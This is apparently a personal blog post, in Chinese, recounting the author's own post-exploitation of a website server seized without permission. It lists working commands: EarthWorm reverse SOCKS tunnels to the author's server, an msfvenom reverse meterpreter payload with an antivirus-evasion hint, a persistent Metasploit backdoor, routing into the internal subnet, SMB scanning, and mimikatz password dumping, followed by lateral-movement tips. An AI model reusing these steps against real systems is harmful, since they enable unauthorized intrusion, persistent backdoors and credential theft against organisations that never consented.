0x01初次探索
前不久拿到一個站的shell,但是對內網滲透不熟悉,於是這幾天琢磨了一下內網滲透,藉此記錄一下
拿到了shell後發現,僅僅是iis權限,於是看下補丁拿到https://bugs.hacking8.com/tiquan/查看有什麼能夠提權利用的補丁沒有打,順利找到後
提權成功後,query user一下看看是否有用戶在線,確認沒有後(畢竟是對方的深夜時刻)臨時創建一個administrator權限用戶,3389登錄一下,此時發現無法連接
ping一下發現ip不同,顯然需要代理,由於第一次使用,不得不學習一下
工具使用EarthWorm+proxifier,象徵性的介紹一下:
EarthWorm是一款用於開啓 SOCKS v5 代理服務的工具,基於標準 C 開發,可提供多平臺間的轉接通訊,用於複雜網絡環境下的數據轉發;
Proxifier是一款功能非常強大的socks5客戶端,可以讓不支持通過代理服務器工作的網絡程序能通過HTTPS或SOCKS代理或代理鏈。
端口轉發原理不詳述,百度瞭解一下,大佬們講的很清楚。
首先現在服務器上開啓ew就行監聽與轉發
root@iZ2zeg3h4a24fnp0q315gfZ:~# ./ew_for_linux64 -s rcsocks -l 9876 -e 9867
rcsocks 0.0.0.0:9876 <--[10000 usec]--> 0.0.0.0:9867
init cmd_server_for_rc here
start listen port here
等待目標靶機訪問9867端口
肉雞中上傳ew,訪問服務器9867端口,打通轉發通道的一半路程
./ew -s rssocks -d ip -e 9867
再本地物理機上,使用proxifier代理服務器的9876端口,從而打開另一半通道實現端口轉發整個過程
此時3389連接即可,圖中可以發現mstsc.exe程序的流量在走我們打通的通道
emmmm,以上只是自己(作爲一隻菜雞)的探索,後來經過大佬們提起最好是反彈一個shell去操作,不會有不必要的麻煩。
於是上傳一個msfpayload(最好免殺),administrator權限執行,反彈一個merterpreter會話,當然你也可以使用MSF生成一個反彈的 ps1的shell
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=ip lport=port-f psh-reflection>/tmp/search.ps1
會有些許免殺作用,且其可用利用系統訪問範圍幾乎是全覆蓋的
shell上線後,ps一下進程,轉移一下進程,不會關閉的那種,當然服務器會一直開機,一般不會做其他操作
或者建立一個持續後門
然後
use exploit/multi/handler
set payload windows/metsvc_bind_tcp
set RHOST ip
set LPORT 31337
exploit
等待連接即可
以上是一點小插曲,下面開始內網滲透(可惜不是域,只是工作組)
內網滲透時,需要路由轉發一波
列舉該機器所在的網段
找到相應的網段,添加網關
參看時候設置成功
可以發現:目標:172.16.50.0 掩碼:255.255.25.0 下一跳網關:Session 2
這裏的 Session 2,即當前被攻擊目標主機與MSF平臺建立的meterperter會話,OK, MSF平臺有了去往內網網段的路由,我們就可以直接使用MSF平臺對內網的主機進行進一步的滲透利用了
下面就是信息收集,既然是windows系統爲什麼不smb一下呢?
meterpreter > background
[*] Backgrounding session 2…
放到後臺後,使用msf收集模塊中的smb_version 掃描一遍該網段存活主機的版本
然後使用smb的exp打了一遍發現似乎沒什麼用,於是繼續想辦法,mimikatz抓下密碼,有可能用同一個密碼(rdp服務)
meterpreter > load mimikatz
Loading extension mimikatz...
[!] Loaded x86 Mimikatz on an x64 architecture.
[!] Loaded Mimikatz on a newer OS (Windows 2012 (6.2 Build 9200).).
Did you mean to 'load kiwi' instead?
Success.
沒有發現明文,我本來以爲merterpreter自帶的有問題,於是上傳一個mimikatz然後抓取一下還是沒有找到明文,後來才知道,2012服務器中想讀取明文需要修改註冊表然後重啓電腦可以,但是想想不能重啓,只能繼續想其他辦法。(未完待續)
0x02 小tips
過程中的小tips(太菜了,只是這樣記錄)
1、iis服務器中pe結構的可執行文件,後綴名不會影響執行
2、/appcmd list site /config /xml > c:/sites.xml 可以顯示iis配置的細節
3、在滲透另一個時,可以從連接的服務處進行入手(進入的某數據庫服務器),輸入netstat -abnop tcp,可以發現
顯然改了端口,可以摸到另一個web服務器。
4、缺什麼補什麼大法,在滲透另一個主機的時候,發現nbtstat命令不能用,於是
本機新建一個nbtstat.exe(當然要操作系統位數要一樣),然後上傳上去執行即可。
0x03尾記
一篇沒有乾貨的文章,菜雞我還在學習後滲透中,記錄知識點只是爲了以後忘記時可以更好地溫故知新,畢竟自己太菜了,如有錯誤,感謝大佬指正。